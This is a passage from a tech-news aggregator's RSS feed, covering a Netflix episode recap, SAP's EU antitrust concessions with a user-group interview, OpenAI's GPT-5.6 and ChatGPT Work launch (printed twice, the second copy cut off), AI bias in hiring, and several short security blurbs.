<li><strong>Elevate your applications with Firestore’s new advanced query engine<br></strong><span>We have fundamentally reimagined Firestore with pipeline operations for Enterprise edition. Experience a powerful new engine featuring over a hundred new query features, index-less queries, new index types, and observability tooling to improve query performance. Seamlessly migrate using built-in tools and leverage Firestore’s existing differentiated serverless foundation, virtually unlimited scale, and industry-leading SLA. Join a community of 600K developers to craft expressive applications that maximize the benefits of rich queryability, real-time listen queries, robust offline caching, and cutting-edge AI-assistive coding integrations.<br><br></span><a href="https://cloud.google.com/blog/products/data-analytics/new-firestore-query-engine-enables-pipelines?e=48754805"><span>Learn more about Firestore pipeline operations.</span></a></li>
</ul></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[‘Agent Kim Reactivated’ Episode 5 Ending Explained: What Happens to Min Ji?]]></title>
<description><![CDATA[Agent Kim Reactivated Episode 5 brings Manager Kim painfully close to finding Min Ji, but the ending places his daughter in even greater danger. She escapes Golden Teeth and the freezing storage facility, only to unknowingly enter Mr. Ju’s car during the final scene.



Agent Kim Reactivated Epis...]]></description>
<link>https://tsecurity.de/de/3661867/ios-mac-os/agent-kim-reactivated-episode-5-ending-explained-what-happens-to-min-ji/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661867/ios-mac-os/agent-kim-reactivated-episode-5-ending-explained-what-happens-to-min-ji/</guid>
<pubDate>Sat, 11 Jul 2026 14:53:19 +0200</pubDate>
<category>🍏 iOS / Mac OS</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Agent Kim Reactivated Episode 5 brings Manager Kim painfully close to finding Min Ji, but the ending places his daughter in even greater danger. She escapes Golden Teeth and the freezing storage facility, only to unknowingly enter Mr. Ju’s car during the final scene.



Agent Kim Reactivated Episode 5 Details




Release date: July 10, 2026



Streaming platform: Netflix



Genre: Action, crime, comedy and spy thriller



Episode duration: Around 70 minutes



Main cast: So Ji-sub, Choi Dae-hoon, Yoon Kyung-ho, Joo Sang-wook, Son Na-eun and Seo Su-min




Major spoilers ahead for Agent Kim Reactivated Episode 5.



Episode 5 follows Manager Kim as he races toward the cold storage facility where Min Ji is being held. At the same time, Min Ji begins fighting for her own survival, proving that she has inherited her father’s courage and quick thinking.



How Does Min Ji Escape Golden Teeth?



Golden Teeth tries to convince Min Ji to stay quiet and pretend that nothing happened. However, she refuses to cooperate.



While Golden Teeth becomes distracted, Min Ji manages to trap him inside the cold storage room. She then escapes into the port area, even though she is exhausted, freezing and struggling to understand what is happening around her.



Manager Kim reaches the storage facility shortly afterwards, but Min Ji has already left. He finds the message she dropped, which includes an apology to her father.



Kim begins shouting her name while searching the port. Min Ji briefly hears him, but she assumes that his voice is a hallucination caused by the cold and fear. Their near reunion becomes one of the episode’s most frustrating moments.



What Happens to Min Ji in the Ending?



Min Ji eventually reaches a road during heavy rain and tries to find someone willing to give her a ride.



Manager Kim traces her movements to National Highway 87 and searches for nearby CCTV footage. Meanwhile, several groups also begin looking for her, including Mr. Ju’s men and the intelligence agents pursuing Kim.



The final scene reveals that Min Ji has entered Mr. Ju’s car. She appears unaware of his connection to the people responsible for her kidnapping.



Min Ji remains alive at the end of Episode 5, but she is still not safe. Mr. Ju can now use her to control Manager Kim, protect his daughter Hye-ri or force Kim into another confrontation.



The episode ends with Kim still searching, while Min Ji unknowingly travels with one of the most dangerous people involved in the case.



What do you plan to watch next? Let us know in the comments.]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS GovCloud Credential Leak Prompts CISA to Publish Key Cyber Incident Lessons]]></title>
<description><![CDATA[The Cybersecurity and Infrastructure Security Agency (CISA) has publicly detailed an internal security incident involving the exposure of AWS GovCloud credentials in a public code repository, offering rare transparency into how a federal agency handles its own cybersecurity failures. The incident...]]></description>
<link>https://tsecurity.de/de/3661345/it-security-nachrichten/aws-govcloud-credential-leak-prompts-cisa-to-publish-key-cyber-incident-lessons/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3661345/it-security-nachrichten/aws-govcloud-credential-leak-prompts-cisa-to-publish-key-cyber-incident-lessons/</guid>
<pubDate>Sat, 11 Jul 2026 08:06:35 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>The Cybersecurity and Infrastructure Security Agency (CISA) has publicly detailed an internal security incident involving the exposure of AWS GovCloud credentials in a public code repository, offering rare transparency into how a federal agency handles its own cybersecurity failures. The incident began on Friday, May 15, when an investigative reporter contacted CISA about internal AWS […]</p>
<p>The post <a href="https://cyberpress.org/aws-govcloud-credential-leak-prompts-cisa/">AWS GovCloud Credential Leak Prompts CISA to Publish Key Cyber Incident Lessons</a> appeared first on <a href="https://cyberpress.org/">Cyber Security News</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[New Google Tags Will Tell You When an Ad Was Made or Altered Using AI]]></title>
<description><![CDATA[Google has unveiled AI transparency tags for ads.]]></description>
<link>https://tsecurity.de/de/3659640/it-nachrichten/new-google-tags-will-tell-you-when-an-ad-was-made-or-altered-using-ai/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659640/it-nachrichten/new-google-tags-will-tell-you-when-an-ad-was-made-or-altered-using-ai/</guid>
<pubDate>Fri, 10 Jul 2026 14:18:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Google has unveiled AI transparency tags for ads.]]></content:encoded>
</item>
<item>
<title><![CDATA[SAP concedes to EU, freeing CIOs from expensive support shackles]]></title>
<description><![CDATA[The European Commission is ending an antitrust investigation into SAP after the company made numerous concessions worldwide regarding maintenance and support services for on-premises versions of its ERP solution. The Commission began its investigation in September 2025, concerned that SAP forces ...]]></description>
<link>https://tsecurity.de/de/3659505/it-nachrichten/sap-concedes-to-eu-freeing-cios-from-expensive-support-shackles/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659505/it-nachrichten/sap-concedes-to-eu-freeing-cios-from-expensive-support-shackles/</guid>
<pubDate>Fri, 10 Jul 2026 13:17:42 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>The European Commission is ending an antitrust investigation into SAP after the company made numerous concessions worldwide regarding maintenance and support services for on-premises versions of its ERP solution. The <a href="https://www.cio.com/article/4063210/sap-targeted-by-eu-antitrust-investigation-of-its-erp-support-services.html">Commission began its investigation in September 2025</a>, concerned that SAP forces customers to buy its services for longer, and for more licenses, than they need.</p>



<p>In accepting SAP’s commitments, the Commission makes them binding on the company. SAP could still face fines if it fails to make good on its concessions over the next ten years. <a href="https://ec.europa.eu/commission/presscorner/detail/en/ip_26_1554" target="_blank" rel="nofollow">SAP’s promises</a> include:</p>



<ul class="wp-block-list">
<li><strong>Greater freedom of choice in support</strong>: Customers can divide their SAP landscape into sub-areas and choose different support and maintenance providers for each area.</li>



<li><strong>Easier license terminations</strong>: Maintenance and support contracts can be terminated in certain cases — such as when products are phased out, SAP projects fail, the company files for bankruptcy, there are staff reductions, or parts of the business are sold.</li>



<li><strong>More flexible licensing models</strong>: SAP is expanding access to so-called “single-metric” contracts as an alternative basis for licensing and maintenance fees.</li>



<li><strong>Relaxation of contractual obligations</strong>: In the future, the purchase of new licenses will no longer automatically extend the minimum term of existing support contracts.</li>



<li><strong>Easier Re-entry</strong>: Customers who resume SAP support after a hiatus will no longer have to pay reinstatement fees; back payments will also be reduced.</li>
</ul>



<p>In addition, SAP is establishing an internal clearinghouse that customers can contact if they suspect violations of the agreed-upon obligations.</p>



<p>Even though <a href="https://news.sap.com/2026/07/sap-welcomes-european-commission-decision-concluding-investigation-on-premise-maintenance-support-policies/" target="_blank" rel="nofollow">SAP said it welcomed the EU Commission’s decision</a>, the Walldorf-based company is unlikely to be truly happy with the concessions it had to make.</p>



<p>User organizations, though, are happy: Conor Riordan, chair of UKISUG, the UK &amp; Ireland SAP User Group, said, “We welcome the proposed changes to SAP’s support and maintenance policies for on-premise customers. Our members have long called for greater flexibility, transparency and predictability, and these changes appear to be a positive move. This should give organizations more room to adapt to changing business conditions and evolve their SAP estates at a pace that suits them.”</p>



<h2 class="wp-block-heading">More flexibility with SAP support</h2>



<p><a href="https://www.linkedin.com/in/michael-bloch-5b48a0249" target="_blank" rel="nofollow">Michael Bloch</a>, executive director of licensing, contracts and support at DSAG, the German-speaking SAP User Group, went into greater detail in an <a href="https://www.computerwoche.de/article/4195425/eu-bezwingt-sap-so-legen-cios-ihre-teuren-support-fesseln-ab.html">interview with Computerwoche</a>, here translated from the German:</p>



<p><em>How do you assess the European Commission’s decision in general?</em></p>



<p><strong>Michael Bloch:</strong> In principle, we think the decision is a good one for now. Many SAP customers will benefit from it, especially those who continue to run their ERP systems on-premises. Our investment survey shows that numerous companies have still not made the move to the SAP Cloud. They now have significantly more freedom to decide how they want to organize support for their existing software.</p>



<p><em>Who stands to benefit on the provider side? Does the decision open up new opportunities for third-party providers like Rimini Street? Can the potential demand even be met?</em></p>



<p><strong>Bloch</strong>: That will be interesting to watch. At the moment, third-party maintenance is a total niche business, at least in German-speaking countries. Acceptance is significantly higher in the US, but here in Germany, many companies remain rather skeptical of the model. The EU decision could now give this market a new boost. Customers who do not wish to follow SAP’s current strategy will be able to remain on their existing infrastructure in the future and obtain support from another provider. This certainly opens up opportunities for new business models.</p>



<p><em>Does this decision undermine SAP’s cloud strategy?</em></p>



<p><strong>Bloch:</strong> For customers, the decision now truly becomes a matter of principle: Do I follow SAP’s strategic direction, or do I consciously choose a different path? Those who aren’t convinced that the cloud strategy is the right one for their own company can now more easily decide to stay on their existing ERP landscape and, for example, use a different support provider.</p>



<p>However, one must be clear about the consequences. Those who remain on their current system landscape — even with an alternative maintenance provider — are forgoing the innovations that SAP is currently developing around the Autonomous Enterprise. There is no middle ground here. Companies would have to develop many of these functions themselves or recreate them at considerable expense.</p>



<p><em>So is this inevitably an either/or decision?</em></p>



<p><strong>Bloch</strong>: No, that’s exactly the key point. Many companies have heavily customized their ERP systems over the years or decades to fit their industry-specific processes — some customers even refer to “refined” systems. These investments don’t simply have to be written off now.</p>



<p>Instead, companies can continue to operate their proven core systems while simultaneously adding targeted cloud components, such as SAP Cloud ERP for financial processes. This allows them to preserve existing investments while also leveraging new innovations. The EU decision thus opens up additional options for action, but it also makes the strategic decision more challenging for CIOs. They must now define even more precisely what their target architecture should look like for the next five to ten years.</p>



<h2 class="wp-block-heading">2027 – A pivotal year for SAP support</h2>



<p><em>Does this mean that IT decision-makers will now have to forgo a peaceful summer break?</em></p>



<p><strong>Bloch:</strong> I don’t think this will fundamentally increase the pressure. Extended Maintenance doesn’t start until the end of 2027, so there’s still some time left. But companies now have an additional strategic question to answer. The actual decision year is likely to be 2027. By then, many companies will have to determine which system landscape they’ll use in the future and what their long-term SAP strategy will look like.</p>



<p>Even companies that want to stick with their existing ERP landscape will only receive official support until 2030. While that does buy some time, it’s by no means a long planning horizon, especially when alternative ERP strategies or successor solutions need to be evaluated.</p>



<p>That’s why I view it as a positive development that the decision has now been made. It provides clarity and gives companies the opportunity to incorporate these new conditions into their strategic considerations at an early stage.</p>



<p><em>The new regulations also make it easier for companies to dispose of unused licenses and the associated maintenance fees. How significant could the potential savings be?</em></p>



<p><strong>Bloch:</strong> We don’t have specific figures on that. You have to be very careful here, because it depends heavily on the individual case. The key factor is whether a company actually terminates its SAP support entirely, switches to a third-party provider, or simply no longer needs certain products. After all, a system still has to be operated.</p>



<p><em>Is there at least a rough estimate?</em></p>



<p><strong>Bloch:</strong> No, we don’t have reliable empirical data. If companies have products in use that they no longer use at all, they’ll be able to cancel support for them more easily in the future and, of course, save money as a result. However, we don’t know how large this so-called “shelfware” portion actually is.</p>



<p>For companies that have already migrated to S/4HANA or SAP Cloud ERP, this issue should largely be resolved anyway. It’s particularly relevant for those who still have the transition ahead of them. They can now review which unused licenses and maintenance contracts they can phase out and whether this is possible within the framework of SAP’s concessions, since regulations must be observed here as well. Those who are still paying substantial support fees today for products that are no longer in use can achieve significant savings by doing so.</p>



<h2 class="wp-block-heading">Take advantage of the options</h2>



<p><em>Does the EU decision improve companies’ negotiating position with SAP?</em></p>



<p><strong>Bloch:</strong> There’s no one-size-fits-all answer to that. What matters is how a company makes use of its options. In my view, the best results are generally achieved by working with SAP to find a path forward.</p>



<p><em>Why?</em></p>



<p><strong>Bloch:</strong> For example, if you completely cancel SAP support and later sign a new cloud contract, you should expect to forgo certain incentives from SAP. That’s why every decision should be made with all dependencies in mind.</p>



<p>In addition, SAP isn’t the only one offering incentives to move to the cloud. The hyperscalers also have a strong interest in attracting companies to their platforms and, in some cases, offer very attractive incentive programs. This means that companies’ starting points vary greatly.</p>



<p><em>Does this make decisions easier for CIOs?</em></p>



<p><strong>Bloch:</strong> Quite the opposite, actually. While the new situation expands the range of options, it makes strategic decision-making significantly more complex. CIOs must now ask themselves: Which existing systems continue to provide business value for our company? Added to this are questions such as: Where is it worthwhile to retain the existing landscape? And in which areas will we actually benefit from the innovations that SAP will provide in the cloud in the future? Finding exactly this balance will be the real challenge.</p>



<p><em>So does this decision primarily mean that companies gain more time, for example, to weather difficult economic periods or to better prepare for a move to the cloud?</em></p>



<p><strong>Bloch:</strong> Yes, especially for companies that haven’t yet found a compelling business case for moving to the SAP Cloud. They can continue to operate their existing landscape for the time being while simultaneously assessing whether there is still potential for cost savings by eliminating unused licenses and maintenance contracts, in other words, “shelfware.” This can certainly help in individual cases and provides more room to maneuver.</p>



<h2 class="wp-block-heading">Complexity Is Increasing</h2>



<p><em>Has the EU decision resolved the biggest problem in SAP licensing policy, or are there still issues to address?</em></p>



<p><strong>Bloch:</strong> Extended Maintenance remains an important issue for companies that have not yet migrated to S/4HANA. The EU decision also has an impact here. Companies now have significantly more options for organizing their existing system landscape and support in different ways. They no longer have to treat their entire software portfolio uniformly, but can make differentiated decisions depending on the situation.</p>



<p>However, this also increases complexity. Companies now have a whole toolbox of options and must carefully weigh which combination is right for their strategy.</p>



<p><em>What’s the next crucial step?</em></p>



<p><strong>Bloch:</strong> The key now is the practical implementation of the promised measures. Together with SAP, we need to clarify how the new regulations will be structured in detail and how companies can actually make use of them. The obligations will also be monitored by an independent trustee. I therefore hope that, together with SAP, we can provide more clarity on the operational implementation in the near future.</p>



<p><em>Does the EU decision now create additional pressure to act?</em></p>



<p><strong>Bloch:</strong> I don’t think that this will immediately increase the pressure. There’s still some time left until Extended Maintenance begins at the end of 2027. That said, companies now face an additional strategic task: they must assess which new opportunities they want to take advantage of and how these fit into their SAP strategy.</p>



<p><em>When will things get serious?</em></p>



<p><strong>Bloch:</strong> In my view, 2027 will be the decisive year. By then, many companies will need to determine which system landscape they will use to transition to Extended Maintenance and what their long-term SAP strategy should look like. Even companies that decide against moving to the SAP Cloud will gain some time as a result of the EU decision — but official support for their existing systems will end by 2030 at the latest. Especially when alternative ERP solutions are being evaluated in parallel, that’s not a particularly long planning horizon.</p>



<p><em>Your conclusion?</em></p>



<p><strong>Bloch:</strong> Overall, it’s positive that the decision has now been made. It would have been much more difficult for companies if uncertainty had persisted until early 2027. Now the framework is clear, and companies can incorporate it into their strategic decisions early on.</p>



<hr class="wp-block-separator has-alpha-channel-opacity">



<p><a></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CISOs pressured to stay silent about cyber attacks need evidence-led governance for protection]]></title>
<description><![CDATA[CISOs are facing growing pressure to stay quiet about cyber incidents despite stricter regulatory demands for transparency.]]></description>
<link>https://tsecurity.de/de/3659413/it-nachrichten/cisos-pressured-to-stay-silent-about-cyber-attacks-need-evidence-led-governance-for-protection/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659413/it-nachrichten/cisos-pressured-to-stay-silent-about-cyber-attacks-need-evidence-led-governance-for-protection/</guid>
<pubDate>Fri, 10 Jul 2026 12:32:20 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[CISOs are facing growing pressure to stay quiet about cyber incidents despite stricter regulatory demands for transparency.]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI launches ChatGPT Work as it broadens GPT-5.6 rollout]]></title>
<description><![CDATA[OpenAI is sharpening its enterprise AI strategy with the launch of ChatGPT Work, a new agentic platform designed to automate workplace tasks, alongside the broader rollout of its GPT-5.6 models, which the company says deliver stronger performance at lower operating costs.



According to the comp...]]></description>
<link>https://tsecurity.de/de/3659265/it-nachrichten/openai-launches-chatgpt-work-as-it-broadens-gpt-56-rollout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659265/it-nachrichten/openai-launches-chatgpt-work-as-it-broadens-gpt-56-rollout/</guid>
<pubDate>Fri, 10 Jul 2026 11:32:37 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>OpenAI is sharpening its enterprise AI strategy with the launch of ChatGPT Work, a new agentic platform designed to automate workplace tasks, alongside the broader rollout of its GPT-5.6 models, which the company says deliver stronger performance at lower operating costs.</p>



<p>According to the company, ChatGPT Work can operate across applications and files, execute long-running tasks, coordinate multiple tools, and produce business documents, presentations, spreadsheets, and websites, allowing employees to delegate more complex workflows rather than interact through individual prompts.</p>



<p>GPT- 5.6 models, generally available weeks after a <a href="https://www.infoworld.com/article/4194598/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion.html" target="_blank">limited preview</a> following US government restrictions on their broader rollout due to concerns about advanced cybersecurity and biology capabilities, can deliver stronger performance across coding, enterprise knowledge work, cybersecurity, and scientific research while lowering inference costs and token consumption, OpenAI said.</p>



<p>The launch marks a shift in OpenAI’s enterprise strategy. Rather than emphasizing benchmark leadership alone, the company is pitching GPT-5.6 around performance per dollar, arguing that enterprises deploying AI at scale increasingly care as much about operating costs as raw model capability.</p>



<p>“We trained GPT-5.6 to get more useful work from every token,” OpenAI said in a <a href="https://openai.com/index/gpt-5-6/" target="_blank" rel="noreferrer noopener">statement</a>. “The result is stronger performance per dollar: more successful work for the same spend, or comparable results at a lower total cost.”</p>



<p>The models are now generally available through ChatGPT, Codex, and the OpenAI API. OpenAI has priced Sol at $5 per million input tokens and $30 per million output tokens, while Terra and Luna provide progressively lower-cost options for organizations scaling AI deployments, the statement added.</p>



<h2 class="wp-block-heading">Enterprise AI shifts from experimentation to economics</h2>



<p>ChatGPT Work combines GPT-5.6 with enterprise integrations and agentic capabilities that allow users to perform multi-step tasks across connected business applications instead of interacting with AI through isolated prompts. OpenAI said the platform is designed to help organizations automate knowledge work while maintaining enterprise-grade governance and security.</p>



<p>The launch comes as enterprises move beyond AI experimentation and begin deploying models across production workloads, making inference costs a growing concern for CIOs.</p>



<p>“The AI wave has brought productivity gains, but rising token consumption has also created bill shocks for enterprises,” said Neil Shah, vice president for research and partner at Counterpoint Research. “This is forcing organizations to adopt different models for different workloads, making performance per dollar the key metric.”</p>



<p>Faisal Kawoosa, co-founder and chief analyst at Techarc, said enterprises are now evaluating AI investments more pragmatically.</p>



<p>“The exploratory stage of AI is over,” he said. “Organizations can derive value from AI today, but performance per dollar will determine whether it becomes part of everyday business operations or remains an ad hoc tool.”</p>



<h2 class="wp-block-heading">Tiered models for different workloads</h2>



<p>GPT-5.6 Sol is OpenAI’s flagship model for complex reasoning, Terra targets mainstream enterprise applications, and Luna is designed for lower-cost, high-volume deployments.</p>



<p>According to OpenAI, GPT-5.6 Sol scored 53.6 on Agents’ Last Exam, a benchmark for long-running professional workflows, outperforming competing frontier models while requiring significantly lower compute costs.</p>



<p>The company also introduced two new reasoning modes. The max mode allocates additional compute for complex problems, while ultra coordinates four AI agents in parallel to accelerate demanding workflows.</p>



<p>“Ultra goes further by coordinating four agents in parallel by default, trading higher token use for stronger results and faster time-to-result on demanding tasks,” the statement added.</p>



<p>Shah said the architecture reflects how enterprises are increasingly orchestrating multiple AI models.</p>



<p>“GPT-5.6 gives enterprise architects flexibility to route workloads from Luna to Sol depending on whether they require automation, logic, or complex reasoning,” he said.</p>



<p>Kawoosa added that the tiered approach aligns with how enterprise software has traditionally been consumed.</p>



<p>“It gives enterprises of different sizes the flexibility to optimize technology consumption according to their requirements,” he said.</p>



<h2 class="wp-block-heading">Coding, productivity, and security gains</h2>



<p>OpenAI said GPT-5.6 Sol achieved a score of 80 on the Artificial Analysis Coding Agent Index while consuming fewer than half the output tokens of competing models. It also reported state-of-the-art results on Terminal-Bench 2.1 and DeepSWE, benchmarks that measure real-world software engineering tasks.</p>



<p>The company said the models also improve enterprise productivity through stronger document generation capabilities and integrations with Microsoft 365, Google Drive, Slack, and Notion.</p>



<p>On cybersecurity, GPT-5.6 Sol scored 73.5% on ExploitBench, up from 47.9% for GPT-5.5, and nearly doubled its predecessor’s performance on ExploitGym.</p>



<p>“GPT-5.6 supports important defensive tasks such as secure code review, patching, threat modeling, and blue teaming,” OpenAI said.</p>



<h2 class="wp-block-heading">Security remains an enterprise focus</h2>



<p>OpenAI said GPT-5.6 incorporates its “most robust safeguards to date,” combining model-level protections with real-time monitoring and extensive safety testing, including approximately 700,000 GPU hours of automated red-team evaluations.</p>



<p>Shah said layered guardrails and monitoring could become an important differentiator for enterprise deployments.</p>



<p>Kawoosa, however, said CIOs will continue demanding greater transparency before fully trusting frontier AI systems.</p>



<p>“Competition among LLM providers will continue, with vendors constantly testing and challenging each other’s guardrails,” he said.</p>



<p><em>The article originally appeared on <a href="https://www.infoworld.com/article/4195478/openai-launches-chatgpt-work-as-it-broadens-gpt-5-6-rollout.html">InfoWorld</a>.</em></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI’s potential to infect the hiring process with bias]]></title>
<description><![CDATA[You’ll be hard pressed to find an area of corporate America where AI hasn’t found a place, and that includes the tech hiring process. A survey from MyPerfectResume found that 73% of employers say they use AI in hiring decisions, while 52% use it for decisions around restructuring and role plannin...]]></description>
<link>https://tsecurity.de/de/3659261/it-nachrichten/ais-potential-to-infect-the-hiring-process-with-bias/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659261/it-nachrichten/ais-potential-to-infect-the-hiring-process-with-bias/</guid>
<pubDate>Fri, 10 Jul 2026 11:32:30 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>You’ll be hard pressed to find an area of corporate America where AI hasn’t found a place, and that includes the tech hiring process. A <a href="https://www.myperfectresume.com/career-center/careers/basics/ai-in-hiring-layoffs" rel="nofollow">survey from MyPerfectResume</a> found that 73% of employers say they use AI in hiring decisions, while 52% use it for decisions around restructuring and role planning.</p>



<p>On the other side, candidates are also increasingly relying on AI, with 52% of current job seekers reporting they use AI to help them in their job searches to refine submission materials (85%) and prepare for interviews (73%), according to <a href="https://www.sap.com/documents/2026/05/ccd1609f-507f-0010-bca6-c68f7e60039b.html" rel="nofollow">data from SAP</a>.</p>



<p>“Technology can help employers be more efficient, but hiring decisions still benefit from human judgment, especially when a candidate’s experience requires context that automated screening may not understand,” says Jasmine Escalera, career expert at online career and résumé builder Zety.</p>



<p>It’s clear AI is an integral part of the hiring process, and organizations need to prepare a strategy for what that looks like moving forward in terms of hiring bias, transparency, and striking the right balance of human effort and AI assistance.</p>



<h2 class="wp-block-heading">Recognizing the warning signs</h2>



<p>AI has the promise of bringing efficiency in hiring for both job seekers and employees, but if organizations aren’t careful, an overreliance on AI technology can lead to unintended consequences. Further MyPerfectResume data also reveals 65% of respondents say AI often automatically rejects applicants before a person sees them, and 14% say AI rejects more than half of applicants outright.</p>



<p>Additionally, 47% say they feel AI has filtered out candidates who would’ve otherwise advanced in the process. And 51% say they use AI to flag risky candidates, such as people who might be viewed as job-hoppers or who have employment gaps.</p>



<p>Flagging risky candidates and eliminating them before a human can look at their résumé can filter out candidates with experience that tells a more complex story than an algorithm is designed to interpret, says Escalera. Candidates re-entering the workforce after time off, for example, may have valuable skills that don’t fit neatly into automated screening criteria, she adds.</p>



<p>Similarly, there’s concern AI will reject a professional who wants to change industries, or has qualifications that don’t  perfectly reflect the language in a job description before a human has a chance to look.</p>



<p>Laurie Cure, CEO of consulting firm Innovative Connections, says she’s seen instances where AI has eliminated highly qualified yet nervous candidates who take more time than what the AI allocated to answer a question, or candidates may simply use a different language than the AI is programmed to look for, causing them to not be recommended to progress in the process.</p>



<p>She’s also seen where AI might use historical data to determine patterns of a successful employee, identifying certain schools, work histories, tenure, or other characteristics that, while not inherently bias, perpetuates the bias that accurate correlations exist between these elements, when they often don’t. Organizations need to ensure that humans remain a part of these processes, Cure adds, where they can bring context, intuition, nuance, and an ability to identify potential in a candidate that AI can’t replicate.</p>



<p>“I think we’re allowing AI to become the process instead of allowing it to support the process in ways that makes hiring better,” she says.</p>



<h2 class="wp-block-heading">An emphasis on accuracy over speed</h2>



<p>Cure says a major problem for most companies is that the balance is off, with companies using AI for the majority, if not all, of résumé screening rather than as a complement to human efforts. Organizations that simply implement AI to speed up different parts of the hiring process, without taking time to consider if a process stands to benefit from AI, run the risk of introducing bias.</p>



<p>“While this allows for managing high volumes of applicants, and provides greater degrees of consistency in applying job criteria, it likely misses many good candidates,” she says. “The human element needs to be highly active in developing job requirements so they’re not too narrow. Organizations need to look at how they ask AI to do its work, so be cautious how you frame the screening or other criteria.”</p>



<p>Ultimately, AI isn’t a tool to be implemented and forgotten, or one that should be viewed simply as a path to efficiency since many processes still benefit from and require a human touch. It’s important to conduct audits of AI processes in hiring, and to remember that the use of AI doesn’t eliminate the legal or ethical obligations an organization has for equal employment, says Cure, making the balance between human and AI even more important.</p>



<h2 class="wp-block-heading">AI transparency and fostering candidate trust</h2>



<p>AI has also introduced an element of mistrust into hiring on both sides, where employers can’t be sure candidates haven’t relied on AI the same way candidates aren’t always sure exactly how AI is being used in the hiring process. Candidates are aware that employers are implementing AI, but they’re often unsure of the extent it’s being used and when to expect to interact with humans.</p>



<p>“That lack of clarity can create skepticism and frustration, particularly in a job market that already feels highly competitive,” says Escalera. “The goal shouldn’t be to convince candidates that AI isn’t being used, but to help them understand how technology supports decisions rather than replaces the human judgment behind them.”     </p>



<p>Cure recommends organizations start with a process map that outlines every step of an organization’s hiring process to help visualize where AI is beneficial and which processes still require human intervention. Companies can shift to relying too heavily on AI or they may become too dependent on human effort, when that effort could be put toward more important tasks.</p>



<p>“Humans bring an understanding of a person’s broader history, and the ability to detect when a candidate has potential to grow into the role,” she says. “People can see non-traditional career paths and motivations more distinctly than AI. Yet AI brings consistency, efficiency, criteria standardization, and a level of objectivity the process benefits from. If we effectively blend these two at the right points in the process, hiring is enhanced, not diminished.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI launches ChatGPT Work as it broadens GPT-5.6 rollout]]></title>
<description><![CDATA[OpenAI is sharpening its enterprise AI strategy with the launch of ChatGPT Work, a new agentic platform designed to automate workplace tasks, alongside the broader rollout of its GPT-5.6 models, which the company says deliver stronger performance at lower operating costs.



According to the comp...]]></description>
<link>https://tsecurity.de/de/3659231/ai-nachrichten/openai-launches-chatgpt-work-as-it-broadens-gpt-56-rollout/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3659231/ai-nachrichten/openai-launches-chatgpt-work-as-it-broadens-gpt-56-rollout/</guid>
<pubDate>Fri, 10 Jul 2026 11:18:37 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>OpenAI is sharpening its enterprise AI strategy with the launch of ChatGPT Work, a new agentic platform designed to automate workplace tasks, alongside the broader rollout of its GPT-5.6 models, which the company says deliver stronger performance at lower operating costs.</p>



<p>According to the company, ChatGPT Work can operate across applications and files, execute long-running tasks, coordinate multiple tools, and produce business documents, presentations, spreadsheets, and websites, allowing employees to delegate more complex workflows rather than interact through individual prompts.</p>



<p>GPT- 5.6 models, generally available weeks after a <a href="https://www.infoworld.com/article/4194598/openai-to-release-delayed-models-thursday-amidst-a-sea-of-regulatory-confusion.html" target="_blank">limited preview</a> following US government restrictions on their broader rollout due to concerns about advanced cybersecurity and biology capabilities, can deliver stronger performance across coding, enterprise knowledge work, cybersecurity, and scientific research while lowering inference costs and token consumption, OpenAI said.</p>



<p>The launch marks a shift in OpenAI’s enterprise strategy. Rather than emphasizing benchmark leadership alone, the company is pitching GPT-5.6 around performance per dollar, arguing that enterprises deploying AI at scale increasingly care as much about operating costs as raw model capability.</p>



<p>“We trained GPT-5.6 to get more useful work from every token,” OpenAI said in a <a href="https://openai.com/index/gpt-5-6/" target="_blank" rel="noreferrer noopener">statement</a>. “The result is stronger performance per dollar: more successful work for the same spend, or comparable results at a lower total cost.”</p>



<p>The models are now generally available through ChatGPT, Codex, and the OpenAI API. OpenAI has priced Sol at $5 per million input tokens and $30 per million output tokens, while Terra and Luna provide progressively lower-cost options for organizations scaling AI deployments, the statement added.</p>



